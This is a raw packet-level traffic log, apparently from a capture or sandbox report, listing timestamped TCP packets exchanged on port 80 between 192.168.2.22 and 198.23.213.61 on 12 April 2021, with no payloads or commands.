Apr 12, 2021 11:34:50.753190041 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753225088 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753227949 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753262997 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753266096 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753299952 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753312111 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753354073 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753381014 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753397942 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753418922 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753458023 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753468990 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753508091 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753509045 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753545046 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753547907 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753582954 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753585100 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753623009 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753626108 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753660917 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753664970 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753703117 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753707886 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753750086 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753756046 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753787041 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753798962 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753823042 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753825903 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753860950 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753863096 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753900051 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753901005 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753933907 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753937006 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753973961 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753974915 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754012108 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754019022 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754056931 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754060984 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754096985 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754097939 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754137039 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754137039 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754172087 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754173994 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754209042 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754209995 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754247904 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754247904 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754285097 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754295111 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754321098 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754332066 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754368067 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754374981 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754411936 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754421949 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754447937 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754450083 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754507065 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754517078 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754543066 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754548073 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754576921 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754580021 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754616022 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754616022 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754652023 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754662037 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754702091 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754702091 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754738092 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754739046 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754774094 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754775047 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754810095 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754812002 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754848003 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754848003 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754890919 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754893064 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754930019 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.754939079 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754962921 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.754975080 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755011082 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755017042 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755052090 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755053043 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755088091 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755090952 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755124092 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755127907 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755161047 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755163908 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755197048 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755201101 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755237103 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755238056 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755273104 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755281925 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755316973 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755322933 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755358934 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.755359888 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.755398035 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.756831884 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883326054 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883407116 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883456945 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883501053 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883541107 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883579016 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883618116 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883635044 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883656025 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.883693933 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883708000 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883724928 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883734941 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883738995 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883752108 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.883757114 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.890804052 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.890903950 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.890924931 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.890978098 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891009092 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891026974 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891050100 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891068935 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891108990 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891146898 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891149998 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891184092 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891199112 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891222000 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891261101 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891287088 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891299009 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891316891 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891335011 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891347885 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891391039 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891415119 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891428947 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891453981 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891460896 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891468048 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891508102 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891536951 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891546965 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891582966 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891594887 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891612053 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891652107 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891653061 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891680002 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891690969 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891726971 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891766071 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891788960 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891801119 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891803980 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891805887 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891818047 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891851902 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891870022 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891896009 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891923904 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.891933918 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891973019 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.891995907 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892010927 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892016888 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892023087 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892047882 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892071009 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892081976 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892095089 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892097950 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892133951 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892180920 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892189026 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892196894 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892201900 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892224073 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892229080 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892261982 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892270088 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892277956 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892294884 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892299891 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892327070 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892339945 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892376900 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892383099 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892406940 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892415047 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892441988 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892452955 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892488956 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892499924 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892504930 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892545938 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892576933 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892582893 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892615080 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892621994 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892643929 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892661095 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892690897 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892697096 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892733097 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892735958 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892777920 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892802954 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892848969 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892868996 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892884016 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892891884 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892914057 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892930031 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892968893 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.892985106 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.892996073 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893007040 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893044949 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893068075 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893076897 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893085003 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893095016 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893122911 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893156052 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893170118 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893182039 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893212080 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893243074 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893250942 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893265963 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893290997 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893323898 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893328905 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893353939 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893367052 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893409014 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893421888 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893438101 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893479109 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893515110 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893543959 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893553972 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893562078 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893573046 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893604040 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893624067 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893641949 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893646002 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893678904 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893707037 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893717051 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893743992 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893754005 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893754959 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893793106 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893826008 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893827915 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893842936 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893868923 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893882990 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893923998 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893951893 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893960953 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.893987894 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.893999100 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894011974 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894036055 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894052029 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894073963 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894104004 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894110918 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894129038 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894148111 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894176960 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894187927 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894195080 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894236088 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894259930 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894273996 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894299030 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894310951 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894341946 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894347906 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894352913 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894385099 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894422054 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894423962 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894438982 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894460917 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894481897 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894506931 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894525051 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894551039 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894587994 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894596100 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894607067 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894624949 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894627094 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894663095 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894690037 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894699097 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894730091 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894737005 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894743919 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894774914 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894809961 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894820929 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894825935 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894862890 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894882917 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894900084 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894921064 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894937992 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894968987 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.894974947 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.894987106 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895013094 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895016909 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895051956 CEST	80	49165	198.23.213.61	192.168.2.22
